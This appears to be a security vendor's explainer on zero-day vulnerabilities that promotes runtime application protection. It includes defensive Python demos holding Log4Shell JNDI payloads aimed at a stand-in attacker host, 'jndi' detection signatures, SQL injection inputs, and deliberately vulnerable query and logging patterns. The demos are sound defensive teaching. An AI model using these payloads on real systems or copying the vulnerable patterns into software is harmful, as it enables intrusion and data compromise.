
Zero day

Understanding zero-day threats: their impact on cybersecurity, why they are hard to find, why conventional tools such as a Web Application Firewall (WAF) struggle to counter them, and how Contrast Protect addresses them.


What is the definition of "zero day"?

Also written "0 day," a zero day is a flaw or potential security issue in software or hardware that is unknown to the vendor (or whoever develops the product or code in question) until it is discovered or made public, leaving them with zero days to prepare a fix. Zero days exist in hardware such as servers too, but in application security the biggest focus remains on zero days in the open-source code that applications depend on.

What is a zero-day vulnerability?

A zero-day vulnerability is one that is still "in the wild," meaning no vendor has patched it yet. When ethical security researchers identify such a vulnerability, they notify the vendor or responsible organization so that a patch can be issued before the details are disclosed. During a zero-day event, by contrast, the vulnerability usually comes to light because criminal hackers are already exploiting it, and the vendor has to scramble to publish a patch while attacks are under way.

Zero-day vulnerabilities pose a higher risk to users for the following reasons:

  • Cybercriminals race to exploit these vulnerabilities so as to cash in on their schemes before others are aware of the flaws. 
  • Vulnerable systems remain exposed until the vendor issues a patch and each of the vendor's customers installs it; every unpatched deployment is still at risk.

What is a zero-day exploit?

A zero-day exploit is the code or technique that takes advantage of a zero-day vulnerability; a zero-day attack is the use of that exploit against a target, usually by a malicious actor. Many zero days exist in the wild, but not all of them are exploited.

"Bad actors move fast, and often, zero-day unknowns hidden in the application can expose a security weakness even before an official vulnerability such as a CVE [Common Vulnerabilities and Exposures] is made public," said Jim Mercer, IDC Research Vice President, DevOps and DevSecOps.

What are the impacts of zero-day attacks?

Zero-day exploits can be especially damaging because they target vulnerabilities the organization did not know it had, so nothing was in place to stop them. Ransomware and remote-access Trojans, among other payloads, are often deployed after a zero-day vulnerability has been exploited. Once an organization has been compromised through a zero day, its data may be stolen, its customers may be compromised, its systems may be shut down, and more. In some cases attackers retain access to internal systems and data for months or even years before they are detected. The element of surprise is what makes these vulnerabilities so pernicious.

“Attackers aren't dumb. Exploiting zero-day vulnerabilities, especially those in open-source libraries, is an easy, and likely undetectable, way to gain full access to servers deep inside an organization's infrastructure,” said Contrast Security founder and CTO Jeff Williams.

Examples of zero-day vulnerabilities

Many of the biggest cybersecurity compromises began as zero-day vulnerabilities, including Log4Shell (CVE-2021-44228, in the Log4j 2 library) and Spring4Shell (CVE-2022-22965, in the Spring Framework). The Sony compromise of 2014 is another notable attack associated with a zero-day vulnerability.

Other notable, recent zero-day vulnerabilities:

Initial response to open-source zero-day exploits

Traditionally, most organizations rely on their Web Application Firewall (WAF) for protection, and a WAF blocks only what matches a known signature of an attack. For a zero day no such signature exists until after the exploit is public, and even then writing one is a delicate task: a rule that is too broad blocks legitimate business traffic, while a rule that is too narrow lets a slightly modified exploit, for example one with an encoded or obfuscated payload, straight through.
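The trade-off just described, as an added example that is not part of the original page or of any Contrast product: a small Python model of a lookup-substitution engine of the kind Log4j 2 implemented, with two WAF-style regexes applied to the raw request text and a runtime guard placed at the remote-lookup sink. The sample inputs, the two signatures and the three-lookup engine are constructed for illustration; the nested `${lower:j}` obfuscation is the kind of variant that signature rules miss while a check at the sink still sees the fully expanded key.

```python
import re

# Constructed sample request values (think: a User-Agent header); not real traffic.
SAMPLES = {
    "benign":     "Mozilla/5.0 (X11; Linux x86_64) jndi-client/1.0",
    "plain":      "${jndi:ldap://attacker.example/a}",
    "obfuscated": "${${lower:j}ndi:${lower:l}dap://attacker.example/a}",
}

# Two perimeter (WAF-style) signatures that only ever see the bytes on the wire.
NARROW_SIG = re.compile(r"\$\{jndi:", re.IGNORECASE)  # exact shape of the public exploit
BROAD_SIG = re.compile(r"jndi", re.IGNORECASE)        # loosened in the hope of catching variants


def waf_blocks(signature: re.Pattern, raw: str) -> bool:
    """Signature matching on the raw request string."""
    return signature.search(raw) is not None


class BlockedLookup(Exception):
    """Raised by the runtime guard when a remote lookup is about to execute."""


# One ${...} that contains no further ${ or } inside it: the innermost lookup.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def _resolve(key: str, protect: bool) -> str:
    """Resolve one fully expanded lookup key. Stand-in for a logging library's
    substitution engine; only three lookup types are modelled (an assumption)."""
    if key.startswith("lower:"):
        return key[len("lower:"):].lower()
    if key.startswith("upper:"):
        return key[len("upper:"):].upper()
    if key.startswith("jndi:"):
        # The dangerous sink. A guard placed here sees the key after every
        # level of nesting has been expanded, whatever encoding the request used.
        if protect:
            raise BlockedLookup(key)
        return f"<remote lookup of {key[len('jndi:'):]}>"
    return ""  # unknown lookup type: expands to nothing in this model


def expand(text: str, protect: bool = True) -> str:
    """Innermost-first expansion of ${...} lookups, the way a real engine does it."""
    while (m := INNERMOST.search(text)) is not None:
        text = text[:m.start()] + _resolve(m.group(1), protect) + text[m.end():]
    return text


def runtime_blocks(raw: str) -> bool:
    """Runtime (RASP-style) decision: let expansion run and stop it at the sink."""
    try:
        expand(raw, protect=True)
    except BlockedLookup:
        return True
    return False


def verdicts(raw: str) -> dict:
    return {
        "narrow_waf": waf_blocks(NARROW_SIG, raw),
        "broad_waf": waf_blocks(BROAD_SIG, raw),
        "runtime": runtime_blocks(raw),
    }


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:11} {verdicts(raw)}")
```

The narrow signature has no false positives but misses the obfuscated payload; the broad one blocks the harmless `jndi-client` user agent and still misses the obfuscated payload, because the raw text never contains the four letters together. The sink-side guard passes the benign value and stops both exploit variants, since by the time the lookup runs the key is `jndi:ldap://...` in every case.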

What if there were a way to be protected against such exploits even before they become public knowledge? If that sounds interesting, have a look at Contrast Protect, Contrast Security's RASP (Runtime Application Self-Protection) solution. Contrast Protect blocks more than 180,000 exploit attempts per week at the application level, adding a layer of protection inside your applications, behind your WAF.

How to identify a zero-day vulnerability

Why are there so many uncaught vulnerabilities? Finding a vulnerability and providing the context needed to fix it is hard with traditional SAST and DAST tools. SAST produces so many false positives that software providers often have to choose between developing a feature and triaging and analyzing every single vulnerability report, and go-to-market objectives usually win over security considerations. DAST is not accurate enough, and many vulnerabilities are never found.

Neither tool provides the context developers need to fix a vulnerability easily. SAST lacks information about the affected endpoint, making it hard to reproduce the issue; DAST lacks insight into the code flow, making it hard to pinpoint the right place to fix it.

On the other hand, solutions that focus on detecting anomalous behavior, particularly at runtime, can identify and stop an attack even when the vulnerability being exploited is a zero day.

This is where security observability can help. With continuous runtime security context and visibility into application architecture and software composition, it is possible to detect anomalous behavior and discover issues before a zero day is exploited. Securing software requires a defense-in-depth approach, and deploying runtime protection helps protect an organization's applications and improve its security posture. Runtime security not only protects an application facing threats in production; it also provides valuable insight while software is being developed and tested, enabling organizations to ship much cleaner software in the first place.

There is immense value in analyzing application code and data flows in real time. The goal is to have continuous, real-time security assessments throughout the application life cycle, which can ensure that vulnerabilities are identified and addressed as soon as they’re introduced.

More details on how to mitigate or prevent a zero-day attack: Best practices for zero-day attack prevention

The ultimate goal is either to find and fix vulnerabilities before they are discovered and reported by others, let alone before exploit code is released, or to have a protection mechanism in place that can defend against attacks before they are known.

Depending on traditional tools to defend against zero-day attacks is extremely dangerous: static Software Composition Analysis (SCA) lacks insight into which libraries are actually used at runtime; web application firewalls (WAFs) rely solely on signatures and have no insight into what would actually cause harm inside an application; and Static Application Security Testing (SAST) tools lack context and produce too many false alarms.

When it comes to vulnerabilities, runtime security such as Runtime SCA and Interactive Application Security Testing (IAST) already helps many organizations avoid leaving attack vectors open. When it comes to zero-day defense, Runtime Application Protection (also known as Runtime Application Self-Protection, or RASP) goes a long way. Runtime security is built into the application or its runtime environment, so the technology can observe and control application execution, detect vulnerabilities and stop attacks in real time, regardless of where the application is deployed.

Runtime protection automatically establishes trust boundaries inside the application, in both custom code and libraries. It ensures that many important classes of vulnerabilities cannot be exploited, with little performance overhead. It validates data directly inside the app at the point where the data is used, and improves overall application security by monitoring inputs and blocking those that could enable an attack.

Essentially, RASP instruments your application instantly and transparently so that it behaves as if it had been written with safe coding patterns. It gives unprecedented visibility and protection, blocking attacks quickly and effectively until the underlying vulnerabilities can be addressed.

Runtime protection tools can often stop zero-day exploits with no signature updates required, because they judge what an input does inside the application rather than what it looks like on the wire. As a result, these tools protect not only against zero days once they are known, but also well before the vulnerabilities are disclosed.
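A sketch of how a runtime guard can establish such a trust boundary at a SQL sink, added here as an illustration and not Contrast's implementation (the page does not describe its internals): the application records which parts of a query came from request data, and the instrumented sink refuses to run any query in which untrusted data crosses a token boundary. The `TrackedQuery` class, the tokenizer and the two concatenating lookup functions are assumptions made for this example; a real agent obtains the tainted ranges by propagating taint through string operations rather than by explicit marking, and parameterized queries remain the correct fix for the underlying bug.

```python
import re
from dataclasses import dataclass, field


@dataclass
class TrackedQuery:
    """A SQL string assembled piece by piece, remembering which character
    ranges came from untrusted request data (explicit marking is an
    assumption of this example; an agent would propagate taint itself)."""
    text: str = ""
    tainted: list = field(default_factory=list)  # list of (start, end) ranges

    def add(self, piece: str, untrusted: bool = False) -> "TrackedQuery":
        if untrusted and piece:
            self.tainted.append((len(self.text), len(self.text) + len(piece)))
        self.text += piece
        return self


# Minimal SQL tokenizer: quoted string (with '' as the escaped quote), number,
# identifier or keyword, whitespace, line comment, any other single character.
TOKEN = re.compile(r"'(?:[^']|'')*'|\d+|[A-Za-z_]\w*|\s+|--[^\n]*|.", re.S)


def tokenize(sql: str) -> list:
    return [(m.start(), m.end(), m.group()) for m in TOKEN.finditer(sql)]


def _is_literal(token: str) -> bool:
    return token.startswith("'") or token[0].isdigit()


class InjectionBlocked(Exception):
    """Raised by the instrumented sink instead of sending the query."""


def crosses_trust_boundary(q: TrackedQuery) -> bool:
    """Rule enforced at the sink: untrusted data may only ever form (part of)
    one string or number literal. If it spans more than one token, or turns
    into a keyword, identifier or operator, it changed the query's structure."""
    tokens = tokenize(q.text)
    for start, end in q.tainted:
        touched = [t for ts, te, t in tokens if ts < end and te > start]
        if len(touched) != 1 or not _is_literal(touched[0]):
            return True
    return False


def guarded_execute(q: TrackedQuery) -> str:
    """Stand-in for a database driver's execute(), wrapped by the runtime guard."""
    if crosses_trust_boundary(q):
        raise InjectionBlocked(q.text)
    return q.text  # a real driver would send this to the database


# Two hypothetical application functions that build queries by concatenation.
def find_by_name(name_from_request: str) -> str:
    q = (TrackedQuery()
         .add("SELECT id FROM users WHERE name = '")
         .add(name_from_request.replace("'", "''"), untrusted=True)  # app escapes quotes
         .add("'"))
    return guarded_execute(q)


def find_by_id(id_from_request: str) -> str:
    q = (TrackedQuery()
         .add("SELECT id FROM users WHERE id = ")
         .add(id_from_request, untrusted=True))  # classic unquoted numeric concatenation
    return guarded_execute(q)


def sink_allows(fn, raw: str) -> bool:
    """True if the guarded sink ran the query built from this request value."""
    try:
        fn(raw)
    except InjectionBlocked:
        return False
    return True


if __name__ == "__main__":
    for fn, raw in [(find_by_name, "O'Brien"), (find_by_name, "' OR '1'='1"),
                    (find_by_id, "42"), (find_by_id, "1 OR 1=1"), (find_by_id, "42 -- ")]:
        print(f"{fn.__name__}({raw!r}): {'allowed' if sink_allows(fn, raw) else 'BLOCKED'}")
```

Note what the rule does not need: any signature. `O'Brien` passes because the escaped name stays inside one string literal; the classic `' OR '1'='1` payload also passes through `find_by_name`, correctly, because after escaping it is just a harmless literal; `1 OR 1=1` and the comment-based `42 -- ` are refused by `find_by_id` because the untrusted text has become several tokens, which is exactly the structural change an injection needs.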

IAST tools are another major player when it comes to preventing zero days: they showed log injection vulnerabilities in affected apps months or years before Log4Shell was disclosed. That information empowered software developers and DevOps teams, who used it to prevent the problem with some simple defensive coding techniques. IAST can do this because it evaluates the whole running application at once, instead of separating custom code from open source as SAST and SCA do.
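The defensive coding the paragraph refers to, as an added example that is not code from the page or from any IAST product: a Python logger records a failed login, first with the raw username and then with a neutralized copy. The forged username, the `neutralize` helper and the log format are constructed for this illustration; Python's own `logging` module does not expand `${...}` lookups, so defusing that sequence here is cheap defense in depth aimed at libraries that do.

```python
import io
import logging

# Control characters that let untrusted text start a new log line or fake a field.
_ESCAPES = {"\r": "\\r", "\n": "\\n", "\t": "\\t"}


def neutralize(value: str, max_len: int = 80) -> str:
    """Make untrusted text safe to log: escape CR, LF, TAB and other control
    characters; break the two-character sequence ${ that lookup-expanding
    loggers such as Log4j 2 act on (Python's logging does not, so this part
    is defence in depth and an assumption of this example); and cap the
    length so a single request cannot flood the log."""
    out = []
    for ch in value:
        if ch in _ESCAPES:
            out.append(_ESCAPES[ch])
        elif ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(ch)
    text = "".join(out).replace("${", "$\\{")
    return text if len(text) <= max_len else text[:max_len] + "...(truncated)"


def _capture_logger(name: str):
    """A logger writing to an in-memory buffer so its lines can be inspected."""
    buf = io.StringIO()
    logger = logging.getLogger(name)
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    return logger, buf


def log_failed_login(username: str, hardened: bool) -> list:
    """Log one failed-login event and return the resulting log lines."""
    logger, buf = _capture_logger("hardened" if hardened else "vulnerable")
    # Vulnerable pattern, kept on purpose: untrusted input goes into the log verbatim.
    shown = neutralize(username) if hardened else username
    logger.info("login failed for user %s", shown)
    return buf.getvalue().splitlines()


# Constructed attacker input: a username that forges a second, reassuring log entry.
FORGED_USERNAME = "bob\nINFO login succeeded for user admin"

if __name__ == "__main__":
    print("vulnerable:", log_failed_login(FORGED_USERNAME, hardened=False))
    print("hardened:  ", log_failed_login(FORGED_USERNAME, hardened=True))
```

With the raw username the log gains a second, fabricated "login succeeded" entry that an analyst or a SIEM rule would take at face value; with `neutralize` the same input produces one line in which the newline is visible as `\n`. The same helper turns a `${jndi:...}` payload into text no substitution engine will recognize, which is the kind of fix teams could apply once IAST had flagged untrusted data flowing into log statements.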

Value of using runtime security to detect and prevent zero-day attacks:

  • Stop attacks immediately: Accurately detect and block application attacks and confirm whether the exploit could reach its target: always-on protection for peace of mind.
  • Monitor applications for malicious behavior: Continuous security observability from inside the application, with prioritized and confirmed vulnerabilities and the contextual information that makes fixing them easy.
  • Instrument once and protect forever: Embedded runtime protection continuously monitors applications for threats and scales without additional resources to maintain.

Specifically, it is valuable to have pointed, code-level remediation guidance for those who need to understand and fix vulnerabilities. Developers need to pinpoint exactly where a vulnerability appears in the code and how it works, so they can fix it without needing security expertise. That way, not only can zero days be caught before they are exploited, the issues they pose can also be remediated easily and quickly.

"[O]rganizations lacking dedicated application security teams gain critical safeguards using solutions like Contrast Security Protect that defend against attacks using RASP [Runtime Application Self-Protection]," said Jim Mercer, IDC Research Vice President, DevOps and DevSecOps.

The benefits of Contrast Security runtime security for addressing zero-day vulnerabilities

The Contrast Runtime Security Platform was created in response to the fact that applications are perpetually under attack by hackers intent on doing harm to your business. We recognize that it is virtually impossible to create applications that are completely free of vulnerabilities. The Runtime Security agent continuously detects and prevents both known threats and zero-day attacks by leveraging multi-technique precision sensors and dynamic control over the runtime. It offers an instrumentation-based approach that simplifies security deployment and scaling. Using Runtime Security on any potentially insecure application can help improve your security posture.
